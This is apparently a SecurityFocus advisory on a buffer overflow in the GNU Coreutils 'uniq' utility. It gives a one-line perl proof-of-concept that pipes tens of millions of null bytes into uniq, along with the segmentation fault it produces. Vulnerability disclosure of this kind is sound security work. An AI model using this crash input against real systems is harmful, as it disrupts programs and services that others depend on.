GNU Coreutils 'uniq' Text Utility Buffer Overflow Vulnerability

The following proof-of-concept is available:

% perl -e 'print "1","\0"x50000000,"\r\n\r\n"' | uniq
[2] 8244 done perl -e 'print "1","\0"x50000000,"\r\n\r\n"' |
8245 segmentation fault uniq


 

Privacy Statement
Copyright 2010, SecurityFocus